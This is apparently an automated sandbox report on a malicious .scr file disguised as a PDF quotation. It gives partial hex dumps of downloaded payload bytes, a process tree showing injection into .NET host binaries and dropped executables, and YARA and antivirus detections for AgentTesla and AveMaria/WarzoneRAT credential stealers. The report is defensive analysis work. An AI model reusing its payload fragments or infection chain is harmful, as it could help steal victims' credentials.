59 d9 f2 86 66 98 44 36 c0 40 20 41 11 1e da 18 40 15 18 b6
                                                                          Data Ascii: X*LE.JqE>2!Kn#1Cg?!/{p0)1oH-PC$5Br(G p{9"hog/:5D"kE\y|WZiWZd$>#cc1LV?EM\k2v!L@1J:lNNfRgygdlYfD6@ A@
                                                                          2023-09-19 07:21:51 UTC241INData Raw: 58 ef 9c 3e df 4c 7d a8 5d 72 98 d4 d4 4e 5a 41 6a 2a 3d 07 db d7 68 1d bc 2a d3 60 42 11 35 7c 27 37 f3 09 14 9d 72 1f d8 52 69 09 70 1f 9f e4 24 88 e4 1b c3 87 81 ba a2 66 5c 6c a0 e0 1d 45 9e ff 3b e4 58 f7 71 b1 c5 d9 86 4d 6a fa 70 e7 1b 2c 6b 25 bc cd ed b4 a9 f6 48 55 b6 f8 a3 c7 57 ce d6 2d ba 87 ef 62 f3 22 64 b3 e0 18 e3 79 44 28 9f 75 5f 3e 48 df 1e 55 4f 45 0a 28 af 3c 51 43 aa 40 1c 22 6c 1a ed a2 0e 74 cb 0d a3 be 45 18 df c0 dc 5e ee 71 68 ec a9 94 34 cd 47 99 80 2c fa 40 a7 8a 85 28 0e da b1 20 0e 9e 35 4a dc 6c 6c 9e f2 f0 85 2a cc 44 03 53 f3 c3 b9 e5 4e dd 47 8e 0a 64 59 49 06 8b 40 ed a6 4c d3 06 c3 ff f1 d1 02 cf 36 ba c1 ee 9f 9c f1 fb b4 7e 21 ae cc 7c 53 92 53 62 f2 a0 8f b2 d7 bc 27 31 44 8c a0 0f 08 a2 ec 4b 45 41 cc 6c 18 c6 bb
                                                                          Data Ascii: X>L}]rNZAj*=h*`B5|'7rRip$f\lE;XqMjp,k%HUW-b"dyD(u_>HUOE(<QC@"ltE^qh4G,@( 5Jll*DSNGdYI@L6~!|SSb'1DKEAl
                                                                          2023-09-19 07:21:51 UTC257INData Raw: ed 75 b9 a6 73 72 d8 c3 fc 55 b5 e8 b8 fe 2c e8 a7 b1 77 cc cc dd 07 d3 92 45 7d bb b5 91 ae 5d 94 fb a3 67 ff 16 49 ef 01 b2 dd 02 f4 c1 ca 15 78 49 e5 bf 9a 55 62 fe 5e 9d 58 45 f5 59 59 ff 8f 90 56 14 da f4 69 88 8f 24 27 1f be 5d 7e e9 72 43 b1 ac 71 56 37 73 f2 7c fa 06 c3 c7 5e f5 65 c4 71 0f 74 ff ca eb 76 73 92 3a b4 fd fe 8d eb 19 90 ef e8 ae b8 1e a3 e6 bc 1d 89 60 f8 08 cb fb b6 33 6d 0d 0b 05 dc af 94 cd d2 79 ee 46 a4 75 52 e4 40 ac 3e c3 4c 0e 46 ce 68 3e 9b ff 13 2d af e9 a0 28 fa d5 97 a9 91 f2 f3 1e 09 da d6 7d 17 b8 03 56 c4 1c ac 89 d8 05 68 80 ff 44 15 ba 17 a2 28 ed 7b f5 fe 6a ed 60 f5 a2 b3 67 8f 6c b4 07 bf 31 0a c3 7c db dc 8d bd ed 5e d9 70 d8 94 28 d7 7a f7 4d 9c 62 da c4 2e 5a bb 1a af 8f f4 a8 34 4d ae a0 29 de 6e 97 53 9e 73
                                                                          Data Ascii: usrU,wE}]gIxIUb^XEYYVi$']~rCqV7s|^eqtvs:`3myFuR@>LFh>-(}VhD({j`gl1|^p(zMb.Z4M)nSs
                                                                          2023-09-19 07:21:51 UTC273INData Raw: 3b 44 79 49 9a 3c b6 0e 2b 42 3b 28 9e e5 76 db 45 f8 03 ea 6f 41 4d 2a 63 1e 4d 7c 71 b6 2a 23 c9 63 86 ee 56 2c 18 5b 73 43 d2 e0 c5 b8 a5 7a bc 8e dc 76 51 d1 69 de 5f 20 67 86 23 fc e9 92 27 1a 2a 5d 02 5e 6f 69 33 64 3b a3 ad 7a 18 b2 7b 84 98 11 74 f3 b0 a7 d0 05 1c 42 3a a8 b7 48 37 71 3c d0 11 06 43 74 3f c1 26 96 40 26 4f 84 ca 95 85 94 f6 39 64 dc 48 ba 58 b8 33 26 e3 67 a8 80 8f a7 d0 91 bb 26 ab 7c 61 02 d3 7a b0 eb 2f 9d 56 08 f3 f0 05 da 6f 1e 4a 9c 95 4d f1 d5 03 bf 81 12 50 02 f3 87 32 75 32 fe de 7a df c5 82 f9 35 45 b9 f8 0e 8b 7f b4 4b ce 1b 49 7c e2 1b 88 41 41 17 59 88 ed c3 da 37 4a 74 b5 1b 9f 7c aa e1 b8 6b ea 30 9a 4d 6c 9e 3d a3 c2 04 92 e3 f8 0c 67 f5 bf aa 95 91 40 64 07 3f 1c 73 69 47 5e 8b ee 55 04 e5 06 91 80 cc 32 76 cd e9
                                                                          Data Ascii: ;DyI<+B;(vEoAM*cM|q*#cV,[sCzvQi_ g#'*]^oi3d;z{tB:H7q<Ct?&@&O9dHX3&g&|az/VoJMP2u2z5EKI|AAY7Jt|k0Ml=g@d?siG^U2v
                                                                          2023-09-19 07:21:51 UTC289INData Raw: 11 a3 f5 81 10 20 98 f4 f8 63 73 0d c3 72 ef 73 d1 aa 63 ec 94 0d 28 ac 0d c2 d2 a6 00 71 c6 c1 13 53 36 9a 8c ad dc d0 8f 7e 5f 30 47 cc 1b 9b 69 e3 2a a8 69 1a e1 ce cd f0 9d 4a 76 c3 02 93 f5 c6 a5 9f eb a9 ef 2f f8 4e 37 e6 8a 90 3b 62 35 74 c0 0b 12 b1 b2 26 4b ca a9 c6 23 78 8b 90 11 a0 19 d2 26 93 e4 a5 46 90 a5 da a8 3b c5 63 34 0b 46 04 3e 8c 42 54 0e 19 d9 a7 f1 d8 17 ea 25 0d 88 ce 98 ee ab 4f 61 20 ff ad 2c ef 74 0e 7e bc db 92 9a 7c a5 e5 bb 38 60 01 b1 0b 69 40 dd 5e 4b 40 1b 74 83 3f 7a 09 a2 b0 ec 95 80 73 11 92 3f b5 b5 b8 fc 45 6e 87 5b 0e 06 e0 fc 45 36 5a ae 9d d1 72 e3 04 91 99 91 26 a5 10 ff 72 f1 bf 7f fe 40 13 f1 29 5e 27 1f f5 eb a8 1f 36 b5 c5 a4 6d be df 72 38 1b 22 3f e9 cc 93 3d a7 c0 5d 04 e4 a4 a3 a9 89 a4 96 fd 31 16 4b f7
                                                                          Data Ascii: csrsc(qS6~_0Gi*iJv/N7;b5t&K#x&F;c4F>BT%Oa ,t~|8`i@^K@t?zs?En[E6Zr&r@)^'6mr8"?=]1K
                                                                          2023-09-19 07:21:51 UTC305INData Raw: c7 73 98 3d a1 76 c8 76 a2 ca 7a 0a e6 cc 64 7a dd a2 b6 0b ee ad d4 93 7a 4a 2f 87 59 e9 7c b4 f5 2c 5f f0 3c 10 8c ef 0f db 54 cd 15 94 c2 12 bb fc 20 59 4e 94 eb 5a 5e 44 41 2e 26 e1 bb 75 e6 6f 99 5b 3c e8 ad 2c 29 e3 a2 c1 49 fe 56 71 4c d5 e8 87 be 94 13 bf 12 2d ab 06 df 92 d6 01 03 88 8c e2 0c 65 73 65 0d 11 c1 fb 26 27 19 d3 58 b2 63 20 c2 82 f1 8b 8c a8 3f 82 50 2c 7d 9f 34 76 a4 10 66 c0 c1 69 f0 79 ba ce f0 e7 dc 84 b9 7d 19 89 07 66 7f 24 21 7b 8e 50 38 64 7d 90 4c 4e 7a ac 85 02 46 41 39 58 07 30 08 01 77 70 62 a7 94 f6 fb 08 0a 66 75 df e2 5b b4 74 81 0b e1 65 19 d3 ba 75 ca 8d de 76 42 d7 f3 4e e2 52 71 bc dd 78 76 b7 d9 ff 6e 46 b2 1b 55 87 65 d6 ce 5d bb ce 00 2c 8a d0 34 06 51 2b d2 94 ae b2 65 09 e1 59 a2 98 79 39 17 96 5e 25 75 51 01
                                                                          Data Ascii: s=vvzdzzJ/Y|,_<T YNZ^DA.&uo[<,)IVqL-ese&'Xc ?P,}4vfiy}f$!{P8d}LNzFA9X0wpbfu[teuvBNRqxvnFUe],4Q+eYy9^%uQ
                                                                          2023-09-19 07:21:51 UTC321INData Raw: 73 61 67 65 41 74 74 72 69 62 75 74 65 00 44 65 62 75 67 67 61 62 6c 65 41 74 74 72 69 62 75 74 65 00 4e 75 6c 6c 61 62 6c 65 41 74 74 72 69 62 75 74 65 00 45 64 69 74 6f 72 42 72 6f 77 73 61 62 6c 65 41 74 74 72 69 62 75 74 65 00 43 6f 6d 56 69 73 69 62 6c 65 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 54 69 74 6c 65 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 54 72 61 64 65 6d 61 72 6b 41 74 74 72 69 62 75 74 65 00 54 61 72 67 65 74 46 72 61 6d 65 77 6f 72 6b 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 46 69 6c 65 56 65 72 73 69 6f 6e 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 44 65 73 63 72 69 70 74 69 6f 6e 41 74 74 72
                                                                          Data Ascii: sageAttributeDebuggableAttributeNullableAttributeEditorBrowsableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDescriptionAttr
                                                                          2023-09-19 07:21:51 UTC337INData Raw: ff f3 ff ff ff e7 ff ff 18 64 05 00 68 05 00 00 00 00 00 00 00 00 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 cc ff ff 00 99 ff ff 00 66 ff ff 00 33 ff ff 00 00 ff ff 00 ff cc ff 00 cc cc ff 00 99 cc ff 00 66 cc ff 00 33 cc ff 00 00 cc ff 00 ff 99 ff 00 cc 99 ff 00 99 99 ff 00 66 99 ff 00 33 99 ff 00 00 99 ff 00 ff 66 ff 00 cc 66 ff 00 99 66 ff 00 66 66 ff 00 33 66 ff 00 00 66 ff 00 ff 33 ff 00 cc 33 ff 00 99 33 ff 00 66 33 ff 00 33 33 ff 00 00 33 ff 00 ff 00 ff 00 cc 00 ff 00 99 00 ff 00 66 00 ff 00 33 00 ff 00 00 00 ff 00 ff ff cc 00 cc ff cc 00 99 ff cc 00 66 ff cc 00 33 ff cc 00 00 ff cc 00 ff cc cc 00 cc cc cc 00 99 cc cc 00 66 cc cc 00 33 cc cc 00 00 cc cc
                                                                          Data Ascii: dh( f3f3f3fffff3ff333f3333f3f3f3
                                                                          2023-09-19 07:21:51 UTC353INData Raw: f6 f5 f6 48 ef ed ee 00 c8 c9 ca 00 a0 a0 a2 00 66 66 68 00 74 70 6d 00 95 8c 8a 00 be b1 ad 00 c2 b2 ae 00 c3 b7 b2 00 fc 07 00 00 f0 03 00 00 e0 01 00 00 c0 00 00 00 c0 00 00 00 c0 00 00 00 c0 00 00 00 c0 01 00 00 80 01 00 00 80 07 00 00 00 07 00 00 00 0f 00 00 18 1f 00 00 78 3f 00 00 f8 ff 00 00 f9 ff 00 00 78 a4 05 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 00 30 30 10 00 01 00 04 00 68 06 00 00 01 00 20 20 10 00 01 00 04 00 e8 02 00 00 02 00 10 10 10 00 01 00 04 00 28 01 00 00 03 00 30 30 00 00 01 00 08 00 a8 0e 00 00 04 00 20 20 00 00 01 00 08 00 a8 08 00 00 05 00 10 10 00 00 01 00 08 00 68 05 00 00 06 00 30 30 00 00 01 00 20 00 a8 25 00 00 07 00 20 20 00 00 01 00 20 00 a8 10 00 00 08 00 10 10 00 00 01 00 20 00 68 04 00 00 09 00 0c a5 05
                                                                          Data Ascii: Hffhtpmx?x00h (00 h00 % h


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:09:20:59
                                                                          Start date:19/09/2023
                                                                          Path:C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                                                                          Imagebase:0x800000
                                                                          File size:387'072 bytes
                                                                          MD5 hash:404E68A96892ECFCB88A114E31ABB55C
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.310866427.0000000002D1B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.311069097.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.310866427.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.311069097.0000000003D1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.310866427.0000000002DD8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.310866427.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.311307697.0000000005410000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.311069097.0000000003C3F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:1
                                                                          Start time:09:20:59
                                                                          Start date:19/09/2023
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /release
                                                                          Imagebase:0xc30000
                                                                          File size:232'960 bytes
                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:2
                                                                          Start time:09:20:59
                                                                          Start date:19/09/2023
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6bab10000
                                                                          File size:625'664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:3
                                                                          Start time:09:20:59
                                                                          Start date:19/09/2023
                                                                          Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:ipconfig /release
                                                                          Imagebase:0xbd0000
                                                                          File size:29'184 bytes
                                                                          MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:10
                                                                          Start time:09:21:36
                                                                          Start date:19/09/2023
                                                                          Path:C:\Windows\System32\dllhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\DllHost.exe /Processid:{AA65DD7C-83AC-48C0-A6FD-9B61FEBF8800}
                                                                          Imagebase:0x7ff6bab10000
                                                                          File size:20'888 bytes
                                                                          MD5 hash:2528137C6745C4EADD87817A1909677E
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:20
                                                                          Start time:09:21:43
                                                                          Start date:19/09/2023
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /renew
                                                                          Imagebase:0xc30000
                                                                          File size:232'960 bytes
                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:21
                                                                          Start time:09:21:43
                                                                          Start date:19/09/2023
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6bab10000
                                                                          File size:625'664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:22
                                                                          Start time:09:21:43
                                                                          Start date:19/09/2023
                                                                          Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:ipconfig /renew
                                                                          Imagebase:0xbd0000
                                                                          File size:29'184 bytes
                                                                          MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:24
                                                                          Start time:09:21:48
                                                                          Start date:19/09/2023
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                          Imagebase:0x820000
                                                                          File size:102'568 bytes
                                                                          MD5 hash:4DF5F963C7E18F062E49870D0AFF8F6F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000018.00000002.471458642.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:moderate
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:25
                                                                          Start time:09:21:50
                                                                          Start date:19/09/2023
                                                                          Path:C:\Users\user\AppData\Local\Temp\donexx.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\donexx.exe"
                                                                          Imagebase:0x6c0000
                                                                          File size:363'008 bytes
                                                                          MD5 hash:5CA8DE5B7C87D36341F0578A03615AEE
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000019.00000002.408610902.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000019.00000002.408610902.0000000002CE4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000019.00000002.408610902.0000000002CE7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000019.00000002.408924727.0000000003C71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000019.00000002.408610902.0000000002CFC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000019.00000002.409456316.00000000052C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000019.00000002.408610902.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Avira
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 29%, ReversingLabs
                                                                          • Detection: 47%, Virustotal, Browse
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:33
                                                                          Start time:09:22:34
                                                                          Start date:19/09/2023
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                          Imagebase:0xf90000
                                                                          File size:55'384 bytes
                                                                          MD5 hash:A1CC6D0A95AA5C113FA52BEA08847010
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                          • Rule: AveMaria_WarZone, Description: unknown, Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, Description: Detects executables embedding command execution via IExecuteCommand COM object, Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: MALWARE_Win_WarzoneRAT, Description: Detects AveMaria/WarzoneRAT, Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Reputation:moderate
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:36
                                                                          Start time:09:22:44
                                                                          Start date:19/09/2023
                                                                          Path:C:\Users\user\AppData\Roaming\Fhzejfh.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Roaming\Fhzejfh.exe"
                                                                          Imagebase:0x400000
                                                                          File size:363'008 bytes
                                                                          MD5 hash:5CA8DE5B7C87D36341F0578A03615AEE
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000024.00000002.472719163.00000000029EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000024.00000002.473185909.0000000003A42000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000024.00000002.472719163.000000000293A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000024.00000002.472719163.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000024.00000002.472719163.00000000029D7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000024.00000002.472719163.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000024.00000002.472719163.0000000002771000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Avira
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 29%, ReversingLabs
                                                                          • Detection: 47%, Virustotal, Browse
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:38
                                                                          Start time:09:22:52
                                                                          Start date:19/09/2023
                                                                          Path:C:\Users\user\AppData\Roaming\Fhzejfh.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Roaming\Fhzejfh.exe"
                                                                          Imagebase:0x220000
                                                                          File size:363'008 bytes
                                                                          MD5 hash:5CA8DE5B7C87D36341F0578A03615AEE
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000002.472797955.000000000287C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000002.473331957.00000000038D2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000002.472797955.0000000002884000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000002.472797955.0000000002864000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000002.472797955.0000000002867000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000002.472797955.000000000260A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Disassembly

                                                                          Reset < >

                                                                            Executed Functions

                                                                            Function 02AD3C90 Relevance: 3.9, Strings: 3, Instructions: 195COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
